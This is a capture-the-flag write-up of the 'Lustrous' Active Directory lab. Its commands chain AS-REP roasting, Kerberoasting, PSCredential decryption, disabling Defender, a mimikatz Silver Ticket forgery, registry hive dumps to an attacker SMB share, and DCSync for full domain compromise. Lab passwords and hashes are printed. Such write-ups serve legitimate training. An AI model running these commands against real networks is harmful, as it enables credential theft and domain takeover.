Lustrous is a Medium-difficulty Windows Active Directory lab that focuses on Kerberos abuse, credential decryption, and privilege escalation via Backup Operators. Initial access is achieved through AS-REP roasting of a user account, followed by a Kerberoast attack to recover service account credentials. Local enumeration uncovers an encrypted PSCredential file, which reveals Administrator credentials upon decryption. Using BloodHound, a privileged user in the Backup Operators group is identified. A forged Silver Ticket is then used to impersonate this user and access internal resources. Finally, registry hives are remotely dumped using Backup Operator privileges, and a DCSync attack with a machine account hash results in full domain compromise.

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#LusDC.lustrous.vl 
PORT     STATE SERVICE
21/tcp   open  ftp
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
3389/tcp open  ms-wbt-server

#LusMS.lustrous.vl
Host is up (0.14s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Anonymous FTP was accessible on LusDC, revealing user shares and a .csv file containing several usernames.

1
2
3
4
5
ben.cox
rachel.parker
tony.ward
wayne.taylor
SQLServer2005SQLBrowserUser$LUSDC

Initial Access

ASREP + Kerberoasting

Using the username list, I performed ASREPRoasting and retrieved a hash for ben.cox.
GetNPUsers.py lustrous.vl/ -dc-ip 10.10.177.165 -usersfile ./user.txt -format hashcat -no-pass -request -outputfile hashes.asreproast

I cracked the hash using Hashcat and recovered Ben’s password.

With Ben’s credentials, I executed a Kerberoast attack and extracted hashes for two service accounts. One of them, svc_web, was successfully cracked.

PSCredential Decryption

After logging in, I found an admin.xml file on Ben’s desktop containing a saved credential. Using PowerShell, I decrypted the PSCredential object.

The decrypted credentials belonged to the local Administrator on LUSMS.

1
2
3
4
5
6
powershell $cred = Import-CliXml -Path C:\users\ben.cox\Desktop\admin.xml; $cred.GetNetworkCredential() | Format-List *

UserName       : Administrator
Password       : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
Domain         : LUSMS

Domain Compromise

Silver Ticket

Further enumeration showed that the Domain Controller hosts a web service that is only accessible internally.

By RDP-ing into a workstation using local admin credentials, I accessed the internal site and logged in using Ben’s credentials. It revealed a note-taking app containing Ben’s password.

BloodHound revealed TONY.WARD is a member of the Backup Operators group. With his credentials, we could dump secrets from the DC.

Using the cracked svc_web password, I forged a Silver Ticket to impersonate TONY.WARD and access the internal web service.

1
2
3
# Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
1
mimikatz.exe "kerberos::golden /domain:lustrous.vl /sid:S-1-5-21-2355092754-1584501958-1513963426 /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt"



Then, I accessed the web application using a browser under Tony’s Kerberos context.

1
2
3
4
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" --auth-server-whitelist="LusDc.lustrous.vl" http://LusDc.lustrous.vl

#Alternative
(iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials).Content

BackupOperator Remote

Windows

As we dont have access to DC we have to exploit the backup operators right remotely. To exploit the Backup Operators privilege remotely, I used BackupOperatorToDA along with an SMB share to collect registry hives:

1
2
3
4
5
# Remotely to Our SMB server
.\BackupOperatorToDA.exe -t \\lusdc.lustrous.vl -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -o \\10.8.2.110\share

# If we had access to the DC
.\BackupOperatorToDA.exe -t \\lusdc.lustrous.vl -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -o C:\windows\tasks\


Linux

Alternatively, the registry hives can be dumped from Linux using Impacket’s reg.py.

1
2
3
4
reg.py lustrous.vl/tony.ward:<PASS>@10.10.177.165 save -keyName 'HKLM\SAM' -o '\\10.8.2.110\share'
reg.py lustrous.vl/tony.ward:<PASS>@10.10.177.165 save -keyName 'HKLM\SYSTEM' -o '\\10.8.2.110\share'
reg.py lustrous.vl/tony.ward:<PASS>@10.10.177.165 save -keyName 'HKLM\SECURITY' -o '\\10.8.2.110\share'

DCSync

After parsing the registry dumps, I extracted hashes for a local admin and the machine account.
secretsdump.py -sam SAM.save -system SYSTEM.save -security SECURITY.save local

Using the machine account hash, I performed a DCSync attack to retrieve domain credentials and fully compromise the domain.
secretsdump.py lustrous/'LusDC$'@10.10.177.165 -hashes :<<.......SNIP......>>